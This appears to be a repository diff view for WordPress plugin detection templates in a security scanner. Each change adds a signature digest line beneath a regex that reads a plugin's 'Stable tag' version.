- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022069e02202e7ff83961b5b53cdbfd45103fe25d8a80184f3d65bd0f5d7fe7b4eda022100dfc4667abee1853cbfdd1f9495a1770cd873a3b5f340ca073e57e0ebb0e90588:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/duplicate-page.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502201ffaefde26050311a50cef34fcab2eae3ca70cc7e8ca581181e61c9570494a15022100a95b1405e82b0cc3afc3c117224051e8e95c955b8be73afcc451a2f136392ef0:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/duplicate-post.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100c22c21c6e2027804c840f021f155166efec58669a9d58ba19a54d2632d4007100221008e88cea6f8f6058fad967a73579efcbe869cdc495a46b462890dbe8b147d157a:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/duplicator.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a004730450221009a7cbaa647896edf38d00b7b0c5d0afec2ad2910b2ed0ed27ca8bc17b9c883d1022063ced44a404eb65b9e51443564ab5cd5f3d63bd7336f91ed64a1805abde4241f:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a004730450220241b3aa9cd26182811d67fb2509a4b6c7759d5735c8e3edb41d3d30dfe0eb7bc022100cf84175d0ddcf5b1aaeb840dfd6059fb25ea6623b6d8194da638bc2154a2059f:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/easy-table-of-contents.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100924dc7291bdaacbe1340c7d7d8750e8bcec961a50891191ff07596d3b54e59fa022100c9a892e8790800717040ccf5dd3c169dc69d9eae770bb0fb5219f7d097317956:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/easy-wp-smtp.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022071cc1ea5c48be90fb4cb818be14cab5064b43ab8de60d301c3659260943b5dbc022100e5fef270ee7a95a0f45fdba2c51222ed855db26da44426675aa6e4767cc2717b:922c64590222798bb761d5b6d8e72950

Some files were not shown because too many files have changed in this diff Show More